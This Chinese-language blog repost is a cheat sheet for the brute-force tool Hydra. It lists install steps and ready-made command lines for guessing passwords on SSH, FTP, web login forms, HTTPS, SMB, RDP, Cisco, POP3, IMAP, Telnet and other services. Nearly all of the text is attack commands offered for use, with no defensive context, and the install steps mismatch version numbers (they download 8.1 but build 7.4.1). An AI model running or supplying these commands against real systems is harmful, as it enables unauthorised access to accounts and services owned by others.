Linux下暴力破解工具Hydra

引自:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

安装:

1 wget http://www.thc.org/releases/hydra-8.1.tar.gz
2 tar zxvf hydra-7.4.1.tar.gz
3 cd hydra-7.4.1
4 ./configure 
5 make && make install
  • 破解ssh示例:
hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
  • 破解ftp方法:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
  • get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
  • post方式提交,破解web登录:
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>
hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

  • 破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  • 破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
  • 破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  • 破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
  • 破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
  • 破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

范例参考:http://dfyl520.cn/?post=67

  • 破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
  • 破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  • 破解telnet:
hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。